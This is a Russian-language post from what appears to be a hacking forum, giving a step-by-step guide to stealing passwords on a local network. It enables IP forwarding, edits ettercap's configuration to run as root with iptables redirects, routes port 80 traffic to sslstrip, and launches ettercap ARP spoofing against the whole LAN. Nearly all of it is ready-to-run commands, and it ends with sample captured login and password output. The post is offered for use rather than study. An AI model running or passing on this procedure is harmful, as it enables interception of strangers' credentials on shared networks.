1. Внимание!!! Не заходит на форум? Хотите сохранить доступность к нам на 99.9%? Обязательно запишите все зеркала проекта! Именно по этому мы настоятельно рекомендуем использовать онион домен для TOR-Браузера, там доступность форума будет максимальной. Ссылка для установки и все зеркала в этой темe.

    Зеркало для TOR-Браузера - http://norabizt5qqxefxy.onion

    Чистое зеркало для обычных браузеров - https://nora.holiday

    Скрыть объявление

Перехват паролей в локально сети

Тема в разделе "WARDRIVING & GSM HACKING", создана пользователем xPromo, 4 апр 2018.

  1. xPromo
    off

    xPromo 2+2=ботва УЧАСТНИКИ

    Сообщения:
    90
    Пол:
    Мужской
    Адрес:
    Yamayka
    Репутация:
    16
    Сфера:
    Вирусология
    Всем привет, с вами Nu11ers3t.

    Русскоязычных статей на данную тему я не нашел, да и в каждой статье есть какой-то коллапс, из-за чего ничего не хочет работать. ( лично у меня так было всегда ). По многочисленным просьбам я решил написать статью о том, как перехватить пароли в локальной сети.

    Итак, наш алгоритм действий:

    1) Настраиваем ip_forward
    2) Настраиваем etter.conf
    3) Настраиваем iptables
    4) Запускаем sslstrip
    5) Запускаем ettercap с плагином autoadd
    6) Пьем пивасик
    7) Приходим и радуемся.


    1) Открываем консоль и пишем:

    Код

    echo '1' > /proc/sys/net/ipv4/ip_forward


    2) Открываем консоль опять же:

    Пишем:

    Код

    leafpad /etc/etter.conf


    UPD by 14.04.2014: Если открывается пустое окно, то пишем это:

    Код

    leafpad /etc/ettercap/etter.conf


    В поле [privs] находим строчки:

    Код

    ec_uid = %тут какое-то значение% # nobody is the default
    ec_gid = %тут какое-то значение% # nobody is the default


    Изменяем %тут какое-то значение% на 0.

    В итоге будет так:

    Код

    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default


    Далее жмем ctrl+f и вводим туда iptables

    Нас кидает на следующие строчки:
    Код

    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


    Раскомментируем redir_command_on и redir_command_off

    В итоге будет так:

    Код

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


    3) Теперь нам нужно настроить iptables:

    Вводим команду:

    Код

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


    Теперь весь трафик с 80 порта у нас будет переадресовываться на 8080, на котором мы потом запустим sslstrip

    4) Активируем sslstip:

    Код

    sslstrip -l 8080 -a


    -l - порт на котором слушаем
    -a - снифать все

    5) Запуск атаки

    Код

    ettercap -T -q -P autoadd -i wlan0 -M arp:remote // //


    -T - указываем, что в текстовом режиме
    -q - не показываем содержимое пакетов, только пароли
    -P autoadd - подключаем плагин autoadd, чтобы у нас все будущие клиенты сети тоже были атакованы
    -i wlan0 - указываем, что наш интерфейс это wlan0
    -M arp:remote - указываем, что нам нужен именно ARP Spoofing
    // // - атакуем всю LAN сеть

    Итак, атака запущена.

    Чтобы ее отменить нужно нажать q на англ раскладки ( Не CTRL+C! А именно q, чтобы восстановить arp таблицу! )

    6) Теперь ждем

    7) Как только кто-то залогинится куда либо, то у нас в терминале с ettercap будет строка вида:

    Код

    HTTP : 217.69.139.60:80 -> USER: offsec PASS: password123 INFO: http://e.mail.ru/login?fail=1&sdc=1&page=http://e.mail.ru/messages/inbox/


    Где после USER идет логин, после PASS идет пароль, после INFO будет ссылка






    Автор: Nu11ers3t